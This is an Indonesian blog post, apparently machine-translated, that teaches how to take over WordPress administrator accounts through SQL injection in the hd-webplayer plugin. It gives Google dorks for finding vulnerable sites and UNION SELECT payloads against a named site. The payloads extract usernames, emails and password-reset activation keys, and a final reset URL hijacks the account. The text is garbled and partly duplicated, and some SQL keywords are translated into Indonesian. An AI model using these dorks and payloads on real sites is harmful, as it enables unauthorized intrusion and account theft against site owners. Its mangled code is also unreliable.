mari kita mulai. Pertama-tama kita perlu menemukan halaman rentan. Kita memasuki ini di Google:
Bila Anda menemukan situs Anda, Anda perlu menemukan email admin dan username.
saya akan menggunakan situs ini misalnya:
<img=src"https://fbcdn-sphotos-h-a.akamaihd.net/hphotos-ak-prn2/1173644_684615851568587_1042331220_n.jpg">
Ketika saya menambahkan tanda kutip ' menghilang sehingga rentan.
CATATAN: Saya tidak akan menunjukkan bagaimana SQL inject. Sekarang kita perlu username dan email admin.Kita hanya perlu menyuntikkan:
Sekarang kita memiliki 2 pengguna. http
Kt memilih satu dan menyalin emailnya.
Pergi ke halaman login situs.
Hal ini biasanya di sini:
Dan tekan "Kehilangan kata sandi Anda?"
Sekarang Anda memasukan nama pengguna atau email.
Kita bisa masuk baik sehingga tidak masalah.
aku masuk email.
Sekarang ketika Anda punya: ". Periksa e-mail Anda untuk link konfirmasi" . Artinya tombol reset berhasil dikirim Sekarang kita perlu untuk mendapatkan kunci aktivasi. Kembali ke sintaks yang digunakan untuk mengekstraksi email dan username dan melakukan hal ini:
>
https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-frc3/1175149_684615891568583_407574016_n.jpg
Sekarang kita hanya perlu untuk me-reset. pergi ke:
CATATAN: Ganti kunci = & login = Jadi link saya akan:
Masukkan password baru:
Terima kasih untuk membaca!
Sumber
Code:
# Dork 1 (config.php)
inurl: "/ wp-content/plugins/hd-webplayer/config.php id =?"
# Dork 2 (playlist.php) inurl: "/ wp-content/plugins/hd-webplayer / playlist.php videoid = "?
# Dork 3 (Umum): inurl: "/ wp-content/plugins/hd-webplayer /"
Bila Anda menemukan situs Anda, Anda perlu menemukan email admin dan username.
saya akan menggunakan situs ini misalnya:
Code:
Gambar telah diperkecil 10% (835x513). Klik bar ini untuk melihat gambar asli (924x567). Klik gambar untuk terbuka di jendela baru.
Ketika saya menambahkan tanda kutip ' menghilang sehingga rentan.
CATATAN: Saya tidak akan menunjukkan bagaimana SQL inject. Sekarang kita perlu username dan email admin.Kita hanya perlu menyuntikkan:
Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3, group_concat (user_login, 0x3a, USER_EMAIL, 0x3b), 5,6 , 7,8,9,10,11 DARI wp_users -Sekarang kita memiliki 2 pengguna. http
Kt memilih satu dan menyalin emailnya.
Pergi ke halaman login situs.
Hal ini biasanya di sini:
Dan tekan "Kehilangan kata sandi Anda?"
Sekarang Anda memasukan nama pengguna atau email.
Kita bisa masuk baik sehingga tidak masalah.
aku masuk email.
Sekarang ketika Anda punya: ". Periksa e-mail Anda untuk link konfirmasi" . Artinya tombol reset berhasil dikirim Sekarang kita perlu untuk mendapatkan kunci aktivasi. Kembali ke sintaks yang digunakan untuk mengekstraksi email dan username dan melakukan hal ini:
>https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-frc3/1175149_684615891568583_407574016_n.jpg
Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3, group_concat (user_login, 0x3a, USER_EMAIL, 0x3b), 5,6 , 7,8,9,10,11 DARI wp_users -
Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3, group_concat (user_login, 0x3a, user_activation_key, 0x3b), 5,6 , 7,8,9,10,11 DARI wp_users -Sekarang kita hanya perlu untuk me-reset. pergi ke:
Code:
Tindakan wp-login.php? = rp & key = resetkey & login = namaCATATAN: Ganti kunci = & login = Jadi link saya akan:
Masukkan password baru:
Terima kasih untuk membaca!
Sumber
Tidak ada komentar:
Posting Komentar